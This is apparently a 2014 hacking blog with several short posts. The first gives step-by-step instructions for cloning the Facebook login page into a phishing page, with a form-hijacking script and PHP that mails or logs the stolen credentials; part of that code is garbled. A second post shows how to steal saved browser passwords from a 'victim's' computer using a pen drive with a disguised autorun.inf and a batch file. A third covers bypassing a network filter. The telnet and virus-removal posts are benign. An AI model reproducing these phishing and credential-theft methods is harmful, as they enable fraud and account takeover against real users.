Tuesday, March 11, 2014

Creating Phishing Page

A phishing site is usually made up of 1 to 3 files that are usually scripted in HTML or PHP. The first file is usually a HTML login page with a small script inside that tells the second file to record whatever they type in. The process file is usually coded in PHP, the process file writes to the third file, which is usually the log file, which is usually in a txt format.

Go to a login page, any page at all that you want to make into a fake login, lets use Facebook for example. Go to "www.facebook.com" then on your web browser on the menu bar go to "File>>Save Page As" save it in a folder on your desktop called "Fake Login" (please make sure your not logged in when you save the page) then go to the file, and where you see the file you saved rename it, "index.html".
Now there are two ways to write up the process file. 
Part 1: First one is where you get the login mailed to you.
Part 2: Second is where your login gets recorded into a text document.

Part 1
 Right click index.html and select the option edit, than add the following code to the bottom.

Code:
<script>
var x;for(x in document.forms){void(document.forms[x].action="process.php")};
</script>

Than save. Now we have our login page, the first file of the fake login, now we need our process file. Open notepad, and than copy and paste the following code inside.

Code:
<?php
 = "POST DATAn---------------------------------n";
function log(, ){ global ;  .= ." = ".."n"; }
array_walk(Array, "log");
mail("you@mail.com", "Fake Login", );
header("Location: http://www.website.com");
?>

Now we have to do a bit of editing, on the code above, on the 5th line of code where it says "you@mail.com" replace that with your own email for example "prashantsavior@gmail.com". Now on the 6th line of code where it says "http://www.website.com" replace that with a address that you want your user to be forwarded to after they login to your login file, for example "www.facebook.com". Now save that file as "process.php".

Now we have our login page, the first file of the fake login, now we need our process file. Open notepad, and then copy and paste the following code inside.

Code:
<?php
header("Location: "link");
 = fopen("logs.txt", "a");
foreach(Array as  => ) {
fwrite(, );
fwrite(, "=");
fwrite(, );
fwrite(, "rn");
}
fwrite(, "rn");
fclose();
exit;
?>

Save it as process.php

Part 2:
Will be uploaded soon. Stay tuned.

Happy hacking.


Contributed by: Unpredictable

Monday, March 10, 2014

How to enable TELNET

Telnet is disabled by default for both Windows 7 and Vista. I assume this was an attempt at improving security, for obvious reasons.

Regardless, in order to enable telnet on these operating systems, follow the steps below:

I hardly use Telnet these days, so it took a long time for me to notice that by default it was not packaged with Windows 7. I did some research and found out that this was also true for Windows Vista. More than likely this was an attempt to make Windows more secure by default, as Telnet is very insecure and whenever you have the choice you should always use SSH. However, with that being said, you can quickly re-enable Telnet by following these steps:

Step 1: Click Start
Step 2: Enter the Control Panel
Step 3: Navigate to Programs
Step 4: Go to Programs And Features
Step 5: Click Turn Windows features on or off
Step 6: Check Telnet Client
Step 7: Click OK

After you have enabled telnet, you should be able to use it by entering the Command Prompt with the telnet command.


Author: Unpredictable

For more information you can write us at prashantsavior@gmail.com

STEAL THE PASSWORDS USING PEN DRIVE

                     STEAL SAVED PASSWORDS USING PEN DRIVE 

Note: This tutorial is for educational purpose do not harm anyone by stealing their password. We are not responsible if you do any illegal actions and land yourself into any trouble.


This tutorial doesn't require you to become a champion in programming or an expert hacker. Just follow these simple steps.

Step 1: Download the software, popularly known as WebBrowserPassView. Download it by clikcking here. Download WebBrowserPassView

Step 2: Plug your pen drive and paste the above downloaded software in it.

Step 3: Then create a new notepad in the pendrive and write the code written below.
              [autorun] open=launch.bat
             ACTION= Perform a Virus Scan

Step: 4 Save the file as autorun.inf (note: the file extension should be .inf).

Step 5: Again create one more notepad in the pen drive and type the code given below.
             start WebBrowserPassView.exe /stext WebBrowserPassView.txt

Step 6: Save the file as launch.bat (note: the file extension should be .bat)

Step 7: You have set your pen drive ready. All you have to do now is to go and plug the pen drive in your victims computer and double click on the launch.bat file. If it has saved passwords then it will be saved in the auto created text file named as WebBrowserPassView.txt.

Author: Unpredictable

For more information you can write us at prashantsavior@gmail.com

Thursday, March 6, 2014

Remove Shortcut Virus

All those who are fed up from shortcut virus which gets created in the pendrive, can follow these simple steps.
Insert your pen drive.
Open the pen drive folder.
Open cmd by pressing ctrl+R and then type cmd and press enter.
A command window will appear.
Type the following code
                       attrib -h -r -s /s /d g:\*.*
And press enter and finally you can see that your virus has all been compressed.
Do your desire work with the file you need.

Note: In the code replace h "g:" with your desire drive name.


For more details feel free to contact: prashantsavior@gmail.com

Ankit Fadia's series

A brief about Ankit Fadia:
Ankit Fadia (born 1985) is an Indian independent computer security consultant and author. Fadia describes himself as an ethical hacker, and has written several books on the topic of computer security.
Fadia came into limelight when he wrote Unofficial Guide to Ethical Hacking at the age of 15, and made several hacking claims, including working with intelligence agencies against terrorists. Subsequently, he started offering computer security consulting services, wrote more books, and became a sought-after speaker in India. In the mid-2000s, he developed a certification program on computer security for corporations in alliance with Reliance World.

You can download all of his collection series from the link given below.


Feel free to ask your query at: prashantsavior@gmail.com

Bypassing Cyber-roam and logging in without using id and password:

It has been seen that many of us can't login due to maximum login limit. So the solution for them is that download ultrasurf and run it then you can open your desire site without logging in.
You can download it from the link given below.
Click here to download
For more query feel free to write us @ prashantsavior@gmail.com